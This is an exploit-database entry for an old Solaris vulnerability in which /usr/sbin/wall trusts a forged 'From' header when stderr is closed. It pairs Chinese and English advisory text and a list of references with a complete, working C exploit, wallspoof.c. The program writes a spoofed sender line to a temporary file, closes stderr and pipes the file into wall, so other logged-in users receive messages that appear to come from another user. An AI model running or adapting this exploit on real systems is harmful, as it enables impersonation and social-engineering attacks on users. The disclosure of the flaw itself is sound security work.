https://www.exploit-db.com/exploits/22120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200301-008

Solaris是一款由SunMicrosystems公司开发和维护的UNIX操作系统。Solaris中的wall程序对消息来源处理不正确，本地攻击者可以利用这个漏洞发送伪造来源的消息给其他用户。Wall是setgidtty程序，用于广播消息给当前所有已登录用户。它也可以通过RPC(rpc.walld)接收远程主机上的消息。wall区别本地和远程用户的消息通过检查stderr文件描述符是否指向对应的tty。如果不是，wall会检查消息的最开头5个字节是否为”From”，如果是，下一个非空白字符就必须以user@host形式。攻击者可以在执行/usr/sbin/wall前简单关闭stderr，并发送伪造的”From”头，当其他用户接收此消息时，会认为此消息来自其他用户。利用社会工程学，可能泄露敏感信息。

source: http://www.securityfocus.com/bid/6509/info

Solaris is the freely available UNIX Operating System variant distributed by Sun Microsystems.

The wall client packaged with Solaris makes assumptions about a user's environment when the client is executed. The assumption is made that if the file descriptor of stderr points to a tty when wall is executed, the user is local. If not, the user is considered remote, and the first five bytes of the
supplied 'From' text will be used by wall as the users idenfitication. This makes it possible for a user to close stderr prior to the execution of wall, and send a spoofed message using the client. 

/*
 wallspoof.c - SOLARIS (X86/SPARC) Exploit
 Don't use this in a malicious way! (i.e. to own people)
 */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  char *userhost;
  char mesg[2050];
  FILE *tmp;
  if (argc < 2) {
    fprintf (stderr, "usage: wallspoof user@hostn");
    exit (-1);
  }
  userhost = argv[1];
  if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
    perror ("open");
    exit (-1);
  }
  printf ("Enter your message below.  End your message with an EOF (Control+D).n");
  fprintf (tmp, "From %s:", userhost);
  while (fgets(mesg, 2050, stdin) != NULL)
    fprintf (tmp, "%s", mesg);
  fclose (tmp);
  fclose (stderr);
  printf ("<Done>n");
  system ("/usr/sbin/wall < /tmp/rxax");
  unlink ("/tmp/rxax");
}

来源:US-CERTVulnerabilityNote:VU#944241
名称:VU#944241
链接:http://www.kb.cert.org/vuls/id/944241
来源:XF
名称:solaris-wall-message-spoofing(11608)
链接:http://xforce.iss.net/xforce/xfdb/11608
来源:SUNALERT
名称:51980
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-51980-1
来源:BUGTRAQ
名称:20030103Solaris2.x/usr/sbin/wallAdvisory
链接:http://www.securityfocus.com/archive/1/305105
来源:SECUNIA
名称:7825
链接:http://secunia.com/advisories/7825/
来源:SECTRACK
名称:1006682
链接:http://www.securitytracker.com/id?1006682
来源:SECTRACK
名称:1005882
链接:http://www.securitytracker.com/id?1005882
来源:BID
名称:6509
链接:http://www.securityfocus.com/bid/6509